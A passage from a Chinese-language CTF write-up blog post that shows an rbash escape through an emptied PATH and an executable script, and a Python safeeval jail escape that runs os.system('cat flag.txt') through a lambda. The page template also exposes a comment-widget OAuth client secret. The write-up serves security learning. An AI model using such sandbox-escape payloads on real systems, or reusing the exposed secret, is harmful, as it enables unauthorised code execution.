<p>删除完了之后，linux<code>会自动把path写成当前的工作目录</code>。这样我们就可以在rbash的目录中写文件了，并且可以改权限。</p>
<p>我们的流程如下。</p>
<ol>
<li>删除path，直到为空</li>
<li>新建一个note，命名为<code>vuln</code>，内容为</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line">/flag</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>修改其权限为777</li>
<li>在rbash里面执行<code>vuln</code>即可。</li>
</ol>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509115633394.png" alt="image-20220509115633394"></p>
<h1 id="Turing-complete-safeeval"><a href="#Turing-complete-safeeval" class="headerlink" title="Turing-complete safeeval"></a>Turing-complete safeeval</h1><p>看到源码中使用了<code>pwntools</code>中<code>pwnlib</code>的<code>safeval</code>。找到<a target="_blank" rel="noopener" href="http://docs.pwntools.com/en/latest/util/safeeval.html?highlight=safeeval#module-pwnlib.util.safeeval">官网</a></p>
<p>主函数如下所示。主要是使用了test_expr检查我们的输入参数。之后调用eval执行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">expr</span>(<span class="params">e</span>):</span><br><span class="line">    <span class="keyword">if</span> TURING_COMPLETE:</span><br><span class="line">        c = safeeval.test_expr(e, complete_codes)</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">eval</span>(c)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> safeeval.expr(e)</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;Turing complete mode:&#x27;</span>, <span class="string">&#x27;on&#x27;</span> <span class="keyword">if</span> TURING_COMPLETE <span class="keyword">else</span> <span class="string">&#x27;off&#x27;</span>)</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        e = <span class="built_in">input</span>(<span class="string">&#x27;&gt;&gt;&gt; &#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> e == <span class="string">&#x27;exit&#x27;</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="built_in">print</span>(expr(e))</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> err:</span><br><span class="line">            traceback.print_exc(file=sys.stdout)</span><br><span class="line"><span class="keyword">except</span> EOFError <span class="keyword">as</span> e:</span><br><span class="line">    <span class="built_in">print</span>()</span><br></pre></td></tr></table></figure>

<p>其中 <code>test_expr</code>，链接为<a target="_blank" rel="noopener" href="http://docs.pwntools.com/en/latest/util/safeeval.html?highlight=safeeval#pwnlib.util.safeeval.test_expr">链接</a></p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509110336077.png" alt="image-20220509110336077"></p>
<p>去查看对应的<a target="_blank" rel="noopener" href="https://github.com/Gallopsled/pwntools/blob/ef698d4562024802be5cc3e2fa49333c70a96662/pwnlib/util/safeeval.py#L3">源码</a>发现作用是先把我们的输入编译一下，之后检查里面是否出现了相应的opecode.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">test_expr</span>(<span class="params">expr, allowed_codes</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;test_expr(expr, allowed_codes) -&gt; codeobj</span></span><br><span class="line"><span class="string">    Test that the expression contains only the listed opcodes.</span></span><br><span class="line"><span class="string">    If the expression is valid and contains only allowed codes,</span></span><br><span class="line"><span class="string">    return the compiled code object. Otherwise raise a ValueError</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">import</span> dis</span><br><span class="line">    allowed_codes = [dis.opmap[c] <span class="keyword">for</span> c <span class="keyword">in</span> allowed_codes <span class="keyword">if</span> c <span class="keyword">in</span> dis.opmap]</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        c = <span class="built_in">compile</span>(expr, <span class="string">&quot;&quot;</span>, <span class="string">&quot;eval&quot;</span>)</span><br><span class="line">    <span class="keyword">except</span> SyntaxError:</span><br><span class="line">        <span class="keyword">raise</span> ValueError(<span class="string">&quot;%r is not a valid expression&quot;</span> % expr)</span><br><span class="line">    codes = _get_opcodes(c)</span><br><span class="line">    <span class="keyword">for</span> code <span class="keyword">in</span> codes:</span><br><span class="line">        <span class="keyword">if</span> code <span class="keyword">not</span> <span class="keyword">in</span> allowed_codes:</span><br><span class="line">            <span class="keyword">raise</span> ValueError(<span class="string">&quot;opcode %s not allowed&quot;</span> % dis.opname[code])</span><br><span class="line">    <span class="keyword">return</span> c</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>我们只能使用以下表格中opcode</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">_const_codes = [</span><br><span class="line">    <span class="string">&#x27;POP_TOP&#x27;</span>,<span class="string">&#x27;ROT_TWO&#x27;</span>,<span class="string">&#x27;ROT_THREE&#x27;</span>,<span class="string">&#x27;ROT_FOUR&#x27;</span>,<span class="string">&#x27;DUP_TOP&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BUILD_LIST&#x27;</span>,<span class="string">&#x27;BUILD_MAP&#x27;</span>,<span class="string">&#x27;BUILD_TUPLE&#x27;</span>,<span class="string">&#x27;BUILD_SET&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BUILD_CONST_KEY_MAP&#x27;</span>, <span class="string">&#x27;BUILD_STRING&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;LOAD_CONST&#x27;</span>,<span class="string">&#x27;RETURN_VALUE&#x27;</span>,<span class="string">&#x27;STORE_SUBSCR&#x27;</span>, <span class="string">&#x27;STORE_MAP&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;LIST_TO_TUPLE&#x27;</span>, <span class="string">&#x27;LIST_EXTEND&#x27;</span>, <span class="string">&#x27;SET_UPDATE&#x27;</span>, <span class="string">&#x27;DICT_UPDATE&#x27;</span>, <span class="string">&#x27;DICT_MERGE&#x27;</span>,</span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">_expr_codes = _const_codes + [</span><br><span class="line">    <span class="string">&#x27;UNARY_POSITIVE&#x27;</span>,<span class="string">&#x27;UNARY_NEGATIVE&#x27;</span>,<span class="string">&#x27;UNARY_NOT&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;UNARY_INVERT&#x27;</span>,<span class="string">&#x27;BINARY_POWER&#x27;</span>,<span class="string">&#x27;BINARY_MULTIPLY&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BINARY_DIVIDE&#x27;</span>,<span class="string">&#x27;BINARY_FLOOR_DIVIDE&#x27;</span>,<span class="string">&#x27;BINARY_TRUE_DIVIDE&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BINARY_MODULO&#x27;</span>,<span class="string">&#x27;BINARY_ADD&#x27;</span>,<span class="string">&#x27;BINARY_SUBTRACT&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BINARY_LSHIFT&#x27;</span>,<span class="string">&#x27;BINARY_RSHIFT&#x27;</span>,<span class="string">&#x27;BINARY_AND&#x27;</span>,<span class="string">&#x27;BINARY_XOR&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;BINARY_OR&#x27;</span>,</span><br><span class="line">    ]</span><br></pre></td></tr></table></figure>

<p>但是看到源文件中，给我们patch了两个新的函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># The above only allows Turing-incomplete evaluation,</span></span><br><span class="line"><span class="comment"># so we decided to add our own ingenious additions:</span></span><br><span class="line">complete_codes = _expr_codes + [<span class="string">&#x27;MAKE_FUNCTION&#x27;</span>, <span class="string">&#x27;CALL_FUNCTION&#x27;</span>]</span><br></pre></td></tr></table></figure>

<p>可以想到用lambda表达式。我们尝试创建一个函数，是可以的</p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509112445901.png" alt="image-20220509112445901"></p>
<p>但是却并不能将他赋值。这是哪里出错了呢？</p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509112522650.png" alt="image-20220509112522650"></p>
<p>可以直接对上述表达式外部加括号即可。</p>
<p><img src="/2022/05/08/pyjail/Users\15302\AppData\Roaming\Typora\typora-user-images\image-20220509112622269.png" alt="image-20220509112622269"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>(<span class="keyword">lambda</span> x:<span class="built_in">exec</span>(os.system(<span class="string">&quot;cat flag.txt&quot;</span>)))(<span class="number">1</span>)</span><br><span class="line">sdctf&#123;u5ing_l4mbDA5_t0_smUgg1e_m4licious_BYTECODEz&#125;</span><br></pre></td></tr></table></figure>

<p>后面的(1)表示参数，这里参数就是x但是我们没用过，所以随便填一个就可以了。</p>
<blockquote>
<p>如何测试一个表达式是否被允许</p>
<p>可以手动看compile后的opcode有哪些</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>c = <span class="built_in">compile</span>(<span class="string">&quot;[1 + 2, (1,2)]&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;eval&quot;</span>)</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>_get_opcodes(c)</span><br><span class="line">[<span class="number">100</span>, <span class="number">100</span>, <span class="number">103</span>, <span class="number">83</span>]</span><br></pre></td></tr></table></figure>
</blockquote>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2022/05/08/pyjail/">pyjail</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页"></a></p>
        <p><span>发布时间:</span>2022-05-08, 16:41:28</p>
        <p><span>最后更新:</span>2022-05-10, 13:41:52</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2022/05/08/pyjail/" title="pyjail">https://nicholas-wei.github.io/2022/05/08/pyjail/</a>
            <span class="copy-path" data-clipboard-text="原文: https://nicholas-wei.github.io/2022/05/08/pyjail/　　作者: " title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2022/05/18/volgaCTF2022-pwn/">
                    volgaCTF2022_pwn
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2022/05/05/angstormCTF2022-pwn/">
                    angstormCTF2022_pwn
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#starter"><span class="toc-number">1.</span> <span class="toc-text">starter</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#chall1"><span class="toc-number">1.1.</span> <span class="toc-text">chall1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#chall2"><span class="toc-number">1.2.</span> <span class="toc-text">chall2</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rbash-Warmup"><span class="toc-number">2.</span> <span class="toc-text">Rbash Warmup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rbash-Yet-Another-Calculator"><span class="toc-number">3.</span> <span class="toc-text">Rbash Yet Another Calculator</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rbash-Negotiation-with-the-warden"><span class="toc-number">4.</span> <span class="toc-text">Rbash Negotiation with the warden</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Turing-complete-safeeval"><span class="toc-number">5.</span> <span class="toc-text">Turing-complete safeeval</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"pyjail　| welc0me　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>






<!-- 
    
 -->


  
      <section id='comments' style='margin: 2em; padding: 2em; background: rgba(255, 255, 255, 0.5)'>
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    <script src="https://unpkg.com/gitalk@latest/dist/gitalk.min.js"></script>
    <div id="gitalk-container"></div>
    <script type="text/javascript">
      var gitalk = new Gitalk({
        clientID: 'fb4ffdde2e800246e49f',
        clientSecret: 'b550860fb0906da0fc324e3c81448cd676b55f9e',
        repo: 'nicholas-wei.github.io',
        owner: 'nicholas-wei',
        admin: ['nicholas-wei'],
        id: window.location.pathname
      })
      gitalk.render('gitalk-container')
    </script>
  </section>
  




    <div class="scroll" id="post-nav-button">
        
            <a href="/2022/05/18/volgaCTF2022-pwn/" title="上一篇: volgaCTF2022_pwn">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2022/05/05/angstormCTF2022-pwn/" title="下一篇: angstormCTF2022_pwn">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2023/09/13/FirmAFL/">FirmAFL</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/08/18/satc-source/">satc_source</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/08/11/Emtaint-paper-reading/">Emtaint_paper_reading</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/08/01/angr-basic/">angr-basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/03/decrypt-wechat-db/">decrypt-wechat-db</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/02/tamuctf-pwnme/">tamuctf-pwnme</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/03/20/ej/">ej</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/02/07/royal_ransomeware/">royal_randomeware analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/02/05/mirai/">mirai_botnet_analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/26/corctf2022-corchat/">corctf2022-corchat</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/24/bi0sctf-2023/">bi0sctf-2023</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/20/rwctf-tinyvm/">rwctf-tinyvm</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/19/wasm-pwn/">wasm-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/12/27/ics-pa1/">ics-pa</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/11/13/llvm-pass1/">llvm-pass1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/09/14/leetcode-1/">leetcode-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/28/dp/">dp</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/19/Directed-Grey-Box-Fuzzing-with-Provable-Path-Pruning/">Directed_Grey-Box_Fuzzing_with_Provable_Path_Pruning</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/13/Constraint-guided-Directed-Greybox-Fuzzing/">Constraint-guided_Directed_Greybox_Fuzzing</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/10/crafting-interpreters4/">crafting-interpreters4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/07/crafting-interpreters3/">crafting-interpreters3</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/04/crafting-interpreters2/">crafting-interpreters2——scanning</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/02/house-of-cat/">house-of-cat</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/07/29/crafting-interpreters1/">crafting_interpreters 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/07/28/dice2022-hope/">dice2022@hope</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/30/software-security-lab6/">software-security-lab6</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/18/software-security-lab5/">software-security-lab5</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/18/volgaCTF2022-pwn/">volgaCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/08/pyjail/">pyjail</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/05/angstormCTF2022-pwn/">angstormCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/04/software-security-lab4/">software-security-lab4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/27/pwnhub2022/">pwnhub2022_easyrop</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/25/b01lersCTF2022-pwn/">b01lersCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/15/hackpark2022-shiftycode/">hackpark2022_shiftycode</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/14/input_check_lab/">software-security-lab3</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/07/software-security-lab2/">software-security-lab2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/07/matlab-2/">matlab-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/04/FuzzBuilder-src-understand/">FuzzBuilder_src_understand</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/04/SpaceHeroCTF2022-pwn-wp/">SpaceHeroCTF2022_pwn_wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/01/fb-bot-discord/">fb-bot_discord</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/31/matlab-1/">matlab-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/29/zer0pts2022-accountant/">zer0pts2022_accountant</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/17/fuzzing-6-grammer-fuzzing/">fuzzing-6-grammer_fuzzing</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/16/fuzzing-5-parallelize/">fuzzing-5-parallelize</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/15/fuzzing-4-code_coverage/">fuzzing-4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/13/fuzzing-2/">fuzzing-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/09/software-security-lab1/">software-security_lab1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/09/fuzzing-1-gegeral-knowledge/">fuzzing-1-gegeral_knowledge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/07/umdctf2022-pwn/">umdctf2022-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/06/kernel-6-HijackPrctl/">kernel-6-HijackPrctl</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/02/pwnable-re-alloc-revenge/">pwnable-re-alloc_revenge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/28/SUSCTF2022-pwn/">SUSCTF2022-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/23/tqlctf-nemu/">tqlctf-nemu</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/23/fastbin-reverse-into-tcache/">fastbin-reverse-into-tcache</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/15/kernel-5-bypass-smep1/">kernel-5-bypass_smep1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/14/pwnable-babystack/">pwnable-babystack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/11/kernel-4-doubleFetch/">kernel-4-doubleFetch</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/07/tcache-stashing-unlink-attack/">tcache-stashing-unlink-attack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/03/IO-file-vtable/">IO_file常见利用方法&原理(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/01/pwnable-realloc/">pwnable-realloc</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/31/kernel-3-UAF/">kernel-3-UAF</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/29/IO-file/">IO_file常见利用方法&原理(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/29/largebin-attack/">largebin-attack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/28/hws2022%E5%86%AC%E4%BB%A4%E8%90%A5ctf/">hws2022冬令营入营赛pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/27/RWctf-2022-svme/">RWctf-2022-svme</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/24/kernel-2-stkof/">kernel-2-stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/23/kernel-1-basic_knowledge/">kernel-1-basic_knowledge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/22/Drangonctf2021-noflippidy/">Drangonctf2021-noflippidy</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/21/dicectf2021-flippidy/">dicectf2021_flippidy</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2022-2023 nich0las
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>